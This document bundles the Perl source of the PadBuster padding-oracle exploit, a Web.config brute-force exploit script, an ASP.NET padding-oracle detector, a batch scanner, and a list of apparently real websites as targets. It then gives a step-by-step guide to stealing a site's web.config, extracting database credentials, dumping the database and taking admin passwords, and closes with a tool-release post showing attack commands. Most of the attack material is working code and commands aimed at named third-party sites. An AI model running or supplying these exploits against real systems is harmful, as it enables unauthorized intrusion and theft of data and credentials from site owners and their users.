my $padCount = ($blockSize * $blockCount) - length($plainTextInput); $plainTextInput.= chr($padCount) x $padCount; # SampleBytes is the encrypted text you want to derive intermediate values for, so # copy the current ciphertext block into sampleBytes # Note, nulls are used if not provided and the intermediate values are brute forced $forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "x00" x $blockSize; my $sampleBytes = $forgedBytes; for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) { # IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored my $intermediaryBytes; if ($intermediaryInput && $blockNum == $blockCount) { $intermediaryBytes = &myDecode($intermediaryInput,2); } else { $intermediaryBytes = &processBlock($sampleBytes); } # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block # This will become the next ciphertext block (or IV if the last one) $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize); $forgedBytes = $sampleBytes.$forgedBytes;
&myPrint("nBlock ".($blockNum)." Results:",0); &myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."n",0); } $forgedBytes = &myEncode($forgedBytes, $encoding); chomp($forgedBytes); } else { # DECRYPT MODE &myPrint("INFO: Starting PadBuster Decrypt Mode",0); if ($resumeBlock) { &myPrint("INFO: Resuming previous exploit at Block $resumeBlockn",0); } else { $resumeBlock = 1 } # Assume that the IV is included in our sample and that the first block is the IV for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) { # Since the IV is the first block, our block count is artificially inflated by one &myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***n",0); # SampleBytes is the encrypted text you want to break, so
# lets copy the current ciphertext block into sampleBytes my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize); # IntermediaryBytes is where the the intermediary bytes produced by the algorithm are stored my $intermediaryBytes = &processBlock($sampleBytes); # DecryptedBytes is where the decrypted block is stored my $decryptedBytes; # Now we XOR the decrypted byte with the corresponding byte from the previous block # (or IV if we are in the first block) to get the actual plain-text $blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes : $decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize); &myPrint("nBlock ".($blockNum-1)." Results:",0); &myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0); &myPrint("[+] Plain Text: $decryptedBytesn",0); $plainTextBytes = $plainTextBytes.$decryptedBytes; } } &myPrint("-------------------------------------------------------",0);
&myPrint("** Finished ***n", 0); if ($plainTextInput) { &myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0); } else { &myPrint("[+] Decrypted value (ASCII): $plainTextBytesn",0); &myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."n", 0); &myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."n", 0); } &myPrint("-------------------------------------------------------n",0); sub determineSignature { # Help the user detect the oracle response if an error string was not provided # This logic will automatically suggest the response pattern that occured most often # during the test as this is the most likeley one my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses; &myPrint("The following response signatures were returned:n",0); &myPrint("-------------------------------------------------------",0); if ($useBody) { &myPrint("ID#tFreqtStatustLengthtChksumtLocation",0); } else { &myPrint("ID#tFreqtStatustLengthtLocation",0); } &myPrint("-------------------------------------------------------",0);
my $id = 1; foreach (@sortedGuesses) { my $line = $id; ($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.=""; my @sigFields = split("t", $_); $line .= "t$oracleGuesses{$_}t$sigFields[0]t$sigFields[1]"; $useBody ? ( $line .= "t".unpack( '%32A*', $sigFields[3] ) ) : $line.=""; $line .= "t$sigFields[2]"; &myPrint($line,0); &writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_}); $id++; } &myPrint("-------------------------------------------------------",0); if ($#sortedGuesses == 0 && !$bruteForce) { &myPrint("nERROR: All of the responses were identical.n",0); &myPrint("Double check the Block Size and try again.",0); exit(); } else { my $responseNum = &promptUser("nEnter an ID that matches the error conditionnNOTE: The ID# marked with ** is recommended"); &myPrint("nContinuing test with selection $responseNumn",0); $oracleSignature = $sortedGuesses[$responseNum-1]; }
} sub prepRequest { my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_; # Prepare the request my $testUrl = $pUrl; my $wasSampleFound = 0; if ($pUrl =~ /$pSample/) { $testUrl =~ s/$pSample/$pTestBytes/; $wasSampleFound = 1; } my $testPost = ""; if ($pPost) { $testPost = $pPost; if ($pPost =~ /$pSample/) { $testPost =~ s/$pSample/$pTestBytes/; $wasSampleFound = 1; } } my $testCookies = ""; if ($pCookie) { $testCookies = $pCookie;
if ($pCookie =~ /$pSample/) { $testCookies =~ s/$pSample/$pTestBytes/; $wasSampleFound = 1; } } if ($wasSampleFound == 0) { &myPrint("ERROR: Encrypted sample was not found in the test request",0); exit(); } return ($testUrl, $testPost, $testCookies); } sub processBlock { my ($sampleBytes) = @_; my $analysisMode; # Analysis mode is either 0 (response analysis) or 1 (exploit) $analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1; # The return value of this subroutine is the intermediate text for the block my $returnValue; my $complete = 0; my $autoRetry = 0; my $hasHit = 0;
while ($complete == 0) { # Reset the return value $returnValue = ""; my $repeat = 0; # TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack my $testBytes = "x00" x $blockSize; my $falsePositiveDetector = 0; # Work on one byte at a time, starting with the last byte and moving backwards OUTERLOOP: for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) { INNERLOOP: for (my $i = 255; $i >= 0; $i--) { # Fuzz the test byte substr($testBytes, $byteNum, 1, chr($i)); # Combine the test bytes and the sample my $combinedTestBytes = $testBytes.$sampleBytes; if ($prefix) { $combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes }
$combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat); chomp($combinedTestBytes); if (! $noEncodeOption) { $combinedTestBytes = &uri_escape($combinedTestBytes); } my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes); # Ok, now make the request my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies); my $signatureData = "$statust$contentLengtht$location"; $signatureData = "$statust$contentLengtht$locationt$content" if $useBody; # If this is the first block and there is no padding error message defined, then cycle through # all possible requests and let the user decide what the padding error behavior is. if ($analysisMode == 0) { &myPrint("INFO: No error string was provided...starting response analysisn",0) if ($i == 255);
$oracleGuesses{$signatureData}++; $responseFileBuffer{$signatureData} = "URL: $testUrlnPost Data: $testPostnCookies: $testCookiesnnStatus: $statusnLocation: $locationnContent-Length: $contentLengthnContent:n$content"; if ($byteNum == $blockSize - 1 && $i == 0) { &myPrint("*** Response Analysis Complete ***n",0); &determineSignature(); $analysisMode = 1; $repeat = 1; last OUTERLOOP; } } my $continue = "y"; if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) { # This is for autoretry logic (only works on the first byte) if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) { $hasHit++; } else { # If there was no padding error, then it worked &myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
&myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1); # If continually getting a hit on attempt zero, then something is probably wrong $falsePositiveDetector++ if ($i == 255); if ($interactive == 1) { $continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1); } if ($continue eq "y" || $continue eq "a") { $interactive = 0 if ($continue eq "a"); # Next, calculate the decrypted byte by XORing it with the padding value my ($currentPaddingByte, $nextPaddingByte); # These variables could allow for flexible padding schemes (for now PCKS) # For PCKS#7, the padding block is equal to chr($blockSize - $byteNum) $currentPaddingByte = chr($blockSize - $byteNum); $nextPaddingByte = chr($blockSize - $byteNum + 1);
my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte; &myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1); $returnValue = $decryptedByte.$returnValue; &myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1); # Finally, update the test bytes in preparation for the next round, based on the padding used for (my $k = $byteNum; $k < $blockSize; $k++) { # First, XOR the current test byte with the padding value for this round to recover the decrypted byte substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte)); # Then, XOR it again with the padding byte for the next round substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte)); } last INNERLOOP; } } }
## TODO: Combine these two blocks? if ($i == 0 && $analysisMode == 1) { # End of the road with no success. We should probably try again. &myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0); if ($autoRetry == 0) { $autoRetry = 1; &myPrint(" Automatically trying one more time...",0); $repeat = 1; last OUTERLOOP; } else { if (($byteNum == $blockSize - 1) && ($error)) { &myPrint("nAre you sure you specified the correct error string?",0); &myPrint("Try re-running without the -e option to perform a response analysis.n",0); } $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1); if ($continue ne "n") { &myPrint("INFO: Switching to interactive mode",0); $interactive = 1; $repeat = 1;
last OUTERLOOP; } } } if ($falsePositiveDetector == $blockSize) { &myPrint("n*** ERROR: It appears there are false positive results. ***n",0); &myPrint("HINT: The most likely cause for this is an incorrect error string.n",0); if ($error) { &myPrint("[+] Check the error string you provided and try again, or consider running",0); &myPrint("[+] without an error string to perform an automated response analysis.n",0); } else { &myPrint("[+] You may want to consider defining a custom padding error string",0); &myPrint("[+] instead of the automated response analysis.n",0); } $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1); if ($continue eq "y") { &myPrint("INFO: Switching to interactive mode",0); $interactive = 1; $repeat = 1; last OUTERLOOP; }
} } } ($repeat == 1) ? ($complete = 0) : ($complete = 1); } return $returnValue; } sub makeRequest { my ($method, $url, $data, $cookie) = @_; my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength); my $numRetries = 0; $data ='' unless $data; $cookie='' unless $cookie; $requestTracker++; do { #Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed) $ENV{HTTPS_PROXY} = ""; $lwp = LWP::UserAgent->new(env_proxy => 1, keep_alive => 1, timeout => 30, requests_redirectable => [],
); $req = new HTTP::Request $method => $url; &myPrint("Request:n$methodn$urln$datan$cookie",0) if $superVerbose; # Add request content for POST and PUTS if ($data) { $req->content_type('application/x-www-form-urlencoded'); $req->content($data); } if ($proxy) { my $proxyUrl = "http://"; if ($proxyAuth) { my ($proxyUser, $proxyPass) = split(":",$proxyAuth); $ENV{HTTPS_PROXY_USERNAME} = $proxyUser; $ENV{HTTPS_PROXY_PASSWORD} = $proxyPass; $proxyUrl .= $proxyAuth."@"; } $proxyUrl .= $proxy; $lwp->proxy(['http'], "http://".$proxy); $ENV{HTTPS_PROXY} = "http://".$proxy; }
if ($auth) { my ($httpuser, $httppass) = split(/:/,$auth); $req->authorization_basic($httpuser, $httppass); } # If cookies are defined, add a COOKIE header if (! $cookie eq "") { $req->header(Cookie => $cookie); } if ($headers) { my @customHeaders = split(/;/i,$headers); for (my $i = 0; $i <= $#customHeaders; $i++) { my ($headerName, $headerVal) = split(/::/i,$customHeaders[$i]); $req->header($headerName, $headerVal); } } my $startTime = &gettimeofday(); my $response = $lwp->request($req); my $endTime = &gettimeofday(); $timeTracker = $timeTracker + ($endTime - $startTime); if ($printStats == 1 && $requestTracker % 250 == 0) { print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")n";
$timeTracker = 0; } # Extract the required attributes from the response $status = substr($response->status_line, 0, 3); $content = $response->content; &myPrint("Response Content:n$content",0) if $superVerbose; $location = $response->header("Location"); if (!$location) { $location = "N/A"; } #$contentLength = $response->header("Content-Length"); $contentLength = length($content); my $contentEncoding = $response->header("Content-Encoding"); if ($contentEncoding) { if ($contentEncoding =~ /GZIP/i ) { $content = Compress::Zlib::memGunzip($content); $contentLength = length($content); } } my $statusMsg = $response->status_line; #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);
if ($statusMsg =~ /Can't connect/) { print "ERROR: $statusMsgn Retrying in 10 seconds...nn"; $noConnect = 1; $numRetries++; sleep 10; } else { $noConnect = 0; $totalRequests++; } } until (($noConnect == 0) || ($numRetries >= 15)); if ($numRetries >= 15) { &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.n",0); exit; } return ($status, $content, $location, $contentLength); } sub myPrint { my ($printData, $printLevel) = @_; $printData .= "n"; if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) { print $printData; &writeFile("ActivityLog.txt",$printData); } }
sub myEncode { my ($toEncode, $format) = @_; return &encodeDecode($toEncode, 0, $format); } sub myDecode { my ($toDecode, $format) = @_; return &encodeDecode($toDecode, 1, $format); } sub encodeDecode { my ($toEncodeDecode, $oper, $format) = @_; # Oper: 0=Encode, 1=Decode # Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken my $returnVal = ""; if ($format == 1 || $format == 2) { # HEX if ($oper == 1) { #Decode #Always convert to lower when decoding) $toEncodeDecode = lc($toEncodeDecode); $returnVal = pack("H*",$toEncodeDecode); } else { #Encode $returnVal = unpack("H*",$toEncodeDecode); if ($format == 2) {
#Uppercase $returnVal = uc($returnVal) } } } elsif ($format == 3) { # NetUrlToken if ($oper == 1) { $returnVal = &web64Decode($toEncodeDecode,1); } else { $returnVal = &web64Encode($toEncodeDecode,1); } } elsif ($format == 4) { # Web64 if ($oper == 1) { $returnVal = &web64Decode($toEncodeDecode,0); } else { $returnVal = &web64Encode($toEncodeDecode,0); } } else { # B64 if ($oper == 1) { $returnVal = &decode_base64($toEncodeDecode); } else { $returnVal = &encode_base64($toEncodeDecode); $returnVal =~ s/(r|n)//g; }
} return $returnVal; } sub web64Encode { my ($input, $net) = @_; # net: 0=No Padding Number, 1=Padding (NetUrlToken) $input = &encode_base64($input); $input =~ s/(r|n)//g; $input =~ s/+/-/g; $input =~ s///_/g; my $count = $input =~ s/=//g; $count = 0 if ($count eq ""); $input.=$count if ($net == 1); return $input; } sub web64Decode { my ($input, $net) = @_; # net: 0=No Padding Number, 1=Padding (NetUrlToken) $input =~ s/-/+/g; $input =~ s/_///g; if ($net == 1) { my $count = chop($input);
$input = $input.("=" x int($count)); } return &decode_base64($input); } sub promptUser { my($prompt, $default, $yn) = @_; my $defaultValue = $default ? "[$default]" : ""; print "$prompt $defaultValue: "; chomp(my $input = <STDIN>); $input = $input ? $input : $default; if ($yn) { if ($input =~ /^y|n|a$/) { return $input; } else { &promptUser($prompt, $default, $yn); } } else { if ($input =~ /^-?d/ && $input > 0 && $input < 256) { return $input; } else { &promptUser($prompt, $default); } }
} sub writeFile { my ($fileName, $fileContent) = @_; if ($logFiles) { if ($dirExists != 1) { system($dirCmd." ".$dirName); $dirExists = 1; } $fileName = $dirName.$dirSlash.$fileName; open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileNamen"; print $OUTFILE $fileContent; close($OUTFILE); } } sub getTime { my ($format) = @_; my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) = localtime(time); my @months = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC"); my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT"); $month=sprintf("%02d",$month); $day=sprintf("%02d",$day); $hour=sprintf("%02d",$hour); $minute=sprintf("%02d",$minute);
$second=sprintf("%02d", $second); $year =~ s/^.//; if ($format eq "F") { return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) ); } elsif ($format eq "S") { return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second; } else { return $hour.":".$minute.":".$second; } }  Web.config_bruter.pl #!/usr/bin/perl # # # Webconfig Bruter - exploit tool for downloading Web.config # # FOr use this script you need Pudbuster. # Padbuster is a great tool and Brian Holyfield deserve all the credits. # # # Giorgio Fedon - (giorgio.fedon@mindedsecurity.com) # use LWP::UserAgent; use strict; use Getopt::Std; use MIME::Base64; use URI::Escape; use Getopt::Long; #Definition of vars for .NET my $toEncodeDecode; my $b64Encoded; my $string; my $returnVal;
my $testUrl; my $testBytes; my $sampleBytes; my $testUrl = @ARGV[0]."?d="; my $sampleBytes = @ARGV[1]; my $blockSize = @ARGV[2]; if ($#ARGV < 2) { die " Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize Where: URL = The target URL (and query string if applicable) EncryptedSample = The encrypted value you want to use. This need to come from Padbuster. BlockSize = The block size being used by the algorithm (8 or 16) Poc code by giorgio.fedon@mindedsecurity.com Original Padbuster code from Brian Holyfield - Gotham Digital Science Command Example: ./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16 ";} my $method = "GET"; $sampleBytes = encoder($sampleBytes, 1); my $testBytes = "x00" x $blockSize; my $counter = 0; # Use random bytes my @nums = (0..255); my $status = 1; while ($status) { # Fuzz the test bytes
for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) { substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)])); } # Combine the test bytes and the sample my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0); chomp($combinedTestBytes); $combinedTestBytes =~ s/%0A//g; # Ok, now make the request my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes); if ($status == "200") { # Remove this for "T" exploit if (index($content,"parent.Sys.Application") == -1) { print $content."nn"; print "Total Requests:".$counter."nn"; print "Resulting Exploit Block:".$combinedTestBytes."nn"; last; } } $counter++; } # The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science # # I also did the encoder / decoder, but your logic is definitely better sub encoder { my ($toEncodeDecode, $oper) = @_; # UrlDecoder Encoder
if ($oper == 1) { $toEncodeDecode =~ s/-/+/g; $toEncodeDecode =~ s/_///g; my $count = chop($toEncodeDecode); $toEncodeDecode = $toEncodeDecode.("=" x int($count)); $returnVal = decode_base64($toEncodeDecode); } else { $b64Encoded = encode_base64($toEncodeDecode); $b64Encoded =~ s/(r|n)//g; $b64Encoded =~ s/+/-/g; $b64Encoded =~ s///_/g; my $count = $b64Encoded =~ s/=//g; ($count eq "") ? ($count = 0) : ""; $returnVal = $b64Encoded.$count; } return $returnVal; } sub makeRequest { my ($method, $url) = @_; my ($lwp, $status, $content, $req, $location, $contentLength); # Setup LWP UserAgent $lwp = LWP::UserAgent->new(env_proxy => 1, keep_alive => 1, timeout => 30, requests_redirectable => [], ); $req = new HTTP::Request $method => $url; my $response = $lwp->request($req); # Extract the required attributes from the response $status = substr($response->status_line, 0, 3);
$content = $response->content; #print $content; $location = $response->header("Location"); if ($location eq "") { $location = "N/A"; } $contentLength = $response->header("Content-Length"); return ($status, $content, $location, $contentLength); }  AspNetPaddingOracleDetector.js[ java Script ] /* ---------------------------------------- AspNetPaddingOracleDetector for ASP.NET ---------------------------------------- Duncan Smart, http://blog.dotsmart.net/ */ if (!WScript.FullName.match(/cscript.exe$/i)) { // Re-run in command prompt new ActiveXObject("WScript.Shell").Run('cmd.exe /c cscript.exe //E:JScript //nologo "'+ WScript.ScriptFullName +'" & pause') WScript.Quit(0); } var siteRoot; if (WScript.Arguments.Unnamed.Count != 1) { WScript.Echo("Enter site URL: ") siteRoot = WScript.StdIn.ReadLine() } else { siteRoot = WScript.Arguments.Unnamed.Item(0); } // Append root slash if neccessary if (!siteRoot.match("/$")) siteRoot += "/";
WScript.Echo("Testing site: " + siteRoot); //TODO: add more tests for other padding oracles var response1 = httpGet(siteRoot + "webresource.axd?aspxerrorpath=bar"); var response2 = httpGet(siteRoot + "webresource.axd?d=foo&aspxerrorpath=bar"); // Compare HTTP statuses if (response1.status != response2.status) { WScript.Echo("MIGHT BE VULNERABLE: HTTP status mismatch"); WScript.Echo("rn=== Response 1 ==="); WScript.Echo(response1.status); WScript.Echo("rn=== Response 2 ==="); WScript.Echo(response2.status); WScript.Quit(1); } // Compare headers if (response1.headers != response2.headers) { WScript.Echo("MIGHT BE VULNERABLE: HTTP headers mismatch"); WScript.Echo("rn=== Response 1 ==="); WScript.Echo(response1.headers); WScript.Echo("rn=== Response 2 ==="); WScript.Echo(response2.headers); WScript.Quit(1); } // Compare HTML if (response1.body != response2.body) { WScript.Echo("MIGHT BE VULNERABLE: HTTP body mismatch"); WScript.Echo("=== Response 1 ==="); WScript.Echo(response1.body); WScript.Echo(""); WScript.Echo("=== Response 2 ==="); WScript.Echo(response2.body); WScript.Quit(1); } WScript.Echo("Site might be OK: WebResource.axd is not acting as a padding oracle"); WScript.Quit(0);
// ====== Utilities ====== function httpGet(url) { var http = new ActiveXObject("Microsoft.XMLHTTP"); http.open("GET", url, /*async*/ false); try { http.send(); } catch (err) { return {'status':null, 'headers':null, 'body':null}; } var headers = http.getAllResponseHeaders().split(/rn/); // Remove "Date" header as that will likely be different! headers = filter(headers, function(h){ return !h.match("^Date:") }); return { status: http.status + " " + http.statusText, headers: headers.join("rn"), body: http.responseText }; } // Filters array to items that satisfy 'where' function function filter(array, where){ var newArray = []; for (var i = 0; i < array.length; i++) { if (where(array[i])) newArray.push(array[i]); } return newArray; }  ListSite.txt [ A blank file in which you write th website names ] Eg. http://moitruongsuckhoe.vn http://simpleway.vn http://sieuthi.xuctienthuongmai.vn http://footballonline.vn http://hdradio.vn http://domucgiare.com  CheckPaddingOracle.bat[A batch program for checking oracle vulnerability ]
@echo off setLocal EnableDelayedExpansion for /f "tokens=* delims= " %%a in (ListSite.txt) do ( cscript //nologo AspNetPaddingOracleDetector.js %%a echo. ) cmd How To :  Go to any website " asp.net related ". Do reverse ip domain check and find the server and other sites.
 Copy all sites to notepad and name it as -: ListSite.txt  Run -: CheckPaddingOracle.bat Script it will check vulnerable website from list.
 Open Vunlerable site and check its sourcecode for : /WebResource.axd?d= /ScriptResource.axd?d=
 Sanario I Extracted PaddingOracle.rar have folder that contain all scripts exe.bat, padBuster.pl, web.config_Bruter.pl now,  Open -: exe.bat & and run padBuster.pl  Command -: ..perl.exe padBuster.pl http://madeinvietnam.net/WebResource.axd?d=2uT3s0_S0xTW7_RW6mW1q2 2uT3s0_S0xTW7_RW6mW1q2 16 -encoding 3 -plaintext "|||~/web.config"
 Choose ID - 2  Now, you have Encrypted Value -: T-2QM86TZAAAAAAAAAAAAAAAAAAAAAA1  Now again construct a command like -: ..perl.exe Web.Config_Bruter.pl http://madeinvietnam.net/ScriptResource.axd - 2QM86TZAAAAAAAAAAAAAAAAAAAAAA1
 Copy this command to exe.bat and run it.  You Will Get Resulting Exploit Block : gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0
 Create a link -: http://madeinvietnam.net/ScriptResource.axd?d= gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0  Open it in your web browser.  You will find one XML script now,  Find Kewword -: connection  In tht linke you will get Source address , UserID , Password  Now Open MS Sql and connect to database.
 Now whole database is dumped into your pc or u can say I am connected to there databse now find admin tables & columns and open it up.  You can simply right click on adnin table > and select top 1000 rows
 OK you have got your admin and its password now,  If Password is not encrypted then fine but like our case if password is encrypted then you have to inersept the password through Brup Suit " OR " If You can Decrypt your password its Awesome...  Open -: Brup Suit > proxy > intercept on
PADBUSTER V0.3 AND THE .NET PADDING ORACLE ATTACK Now that a weekend has passed since the .NET patch was released, and since there is already a working public example of how to reliably download a web.config using the padding oracle attack, we have decided to finally releasev0.3 of PadBuster with the "Brute Force" option. This option is specifically designed to handle scenarios where the first block of ciphertext cannot be crafted using CBC-R due to a secret IV. This feature was NOT designed specifically for the .NET attack, as our intention for PadBuster is to be a universal tool for identifying and exploiting padding oracles in any web application. That being said, the brute force option CAN be used to reliably perform a web.config download attack within a reasonable number of requests. Before discussing how to perform this attack using PadBuster, and some of the other new features in this version, it's worth noting that there are more efficient ways to perform the web.config download attack using ScriptResource.axd. The T- Block brute force attack vector, which was originally pointed out to me by James Martin of ESP Technologies and is also discussed here by Giorgio Fedonof Minded Security, is significantly faster and more efficient. This technique, however, is pretty specific to the .NET ScriptResource.axd attack and as suchis not likely to be incorporated into PadBuster (a separate exploit script is probably warranted). The web.config attack using PadBuster is essentially a three step process. Iwill assume that the reader is already familiar with the specifics of why the script resource handler is vulnerable to a file download attack. If you are not familiar with the underlying issue, you can read about it here, here and here. Step 1: Encrypt the Payloadusing CBC-R The first step of the attack is to identify a component that is vulnerable to the padding oracle attack and use it to encrypt the web.config payload (|||~/web.config). This can typically be done in a few ways: 1 - Using WebResource.axd as a padding oracle for CBC-R.
If CustomErrors are NOT enabled, then you don'teven need a valid ciphertext sample to exploit the oracle...you can use an encoded dummy value of all NULLS instead (AAAAAAAAAAAAAAAAAAAAAA2). padBuster.pl http://www.myapp.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAA AA2 AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config" If CustomErrors ARE enabled, you can still use WebResource.axd as the oracle. The caveat, however, is that you'll need to use a valid ciphertext query string sample and use the -prefix option so that PadBuster sends this sample as the prefix of each test request. padBuster.pl http://www.myapp.com/WebResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config" -prefix 1s45vAJre3GVd98iQoAjgQ2 2 - Using ScriptResource.axd as a paddingoracle for CBC-R. Like with the web resource handler, this is pretty straightforward if CustomErrors are not enabled: padBuster.pl http://www.myapp.com/ScriptResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config" If CustomErrors ARE enabled, this handler can also be used as a padding oracle. The interesting thing about this technique is that it seems to work despite implementing all of the workarounds that Microsoft recommended before the patch was issued (CustomErrors using RedirectMode and optional Sleep). This technique, however, requires use of the brute force option so I'll come back to that in a bit. Step 2: Verify the encrypted payload does NOT include pipes This step is optional, but certainly worth performing to ensure that you aren't headed down a dead end road. In order for the exploit to work, the payload you send to the handler (including the "garbage" IV block) CANNOT include any pipe characters. If it does, the payload will never work. To verify this, you can use the padding oracle to decrypt your payload and verify its contents. So assuming that Step 1 produced a payload value of
"iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1", then the following command would be used to verify the contents of the payload. Make sure to use the -noiv option as the first block is the one you are most interested in. padBuster.pl http://www.myapp.com/WebResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAA AAAA AAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 - encoding 3 -noiv So what if your payload DOES include pipes? Not to fear, there's an easy workaround for this too. You may have noticed that when you decrypt samples using PadBuster, it prints the HEX encoded Ciphertext Bytes and Intermediate Bytes with the results of each block. You can optionally use any of these pairs along with the -ciphertext and -intermediate switches to feed PadBuster a known pair of ciphertext/intermediate values for use during CBC-R encryption. Using any one of these pairs to encrypt your exploit payload should producea different payload than would otherwise be generated by PadBuster on its own, which can then be verified to ensure that it does not contain pipes. Step 3: Brute force the first block Now that you have a valid payload, the final step is to obtain the first block that will trigger the file download logic. The reason this step is tricky is that the Framework typically does not pass an IV along with the ciphertext. As such, we can't use the padding oracle to reliably produceour desired first block. The good news is that since you only need the first two bytes of the decrypted value to trigger our exploit (either Q#,q#,R#orr#) you can essentially brute force the needed block with fairly reliable success. And the even better news is that you’d be surprised at how quick it is to blindly brute force one of these values. The approachtaken by PadBuster is similar, but slightly different, than the approachused by Web.config Bruter script released by Giorgio Fedon. I must again credit James Martin for originally sharing his proofof conceptexploit code with me that leveraged this technique for identifying the first block. Instead of random block values, however, PadBuster performs a sequential brute force starting with all NULLS. The sequential brute force ensures that you never attempt the same block value more than once and also allows you to resume the brute force where you left off if the script gets killed (using the -resume option). The example shown below assumes the payload from our Step 2 example above:
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAA AAAAAAAAA AAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 - encoding 3 -bruteforce -log PadBuster's brute force mode works similar to the other modes of PadBuster, where the first step is an automated responseanalysis. The main difference is that rather than identifying a padding error, you want to identify an error that indicates failure of the brute force attempt rather than success. Inmost cases, you may have only one responseto choosefrom...which is totally fine (unless one of the initial 256 fuzzing attempts produces a different response). In the case of ScriptResource.axd, there’s a good chance you'll have more than one as shown below. INFO: Starting PadBuster Brute ForceMode [+] Starting responseanalysis... *** ResponseAnalysis Complete *** The following responsesignatures were returned: ------------------------------------------------------- ID# Freq Status Length Location ------------------------------------------------------- 1 1 200 337 N/A 2 ** 255 404 1524 N/A ------------------------------------------------------- Enter an ID that matches the error condition NOTE: The ID# marked with ** is recommended : The reason for the 200 responseincluded above is the T-Block. For our purposes, we are not using the T-Block so we can select signature #2 (the 404). PadBuster will continue issuing brute force attempts and notify you of every responsethat does not match this signature. You'll likely get several T-Block hits similar to the 200 responseshown above before you hit a block that returns the web.config as shown below (this is just an excerpt from the output) Attempt 4275 - Status: 200 - Content Length: 367 http://www.myapp.com/ScriptResource.axd?d=igA4AAAAAAAAAAAAAAAAA
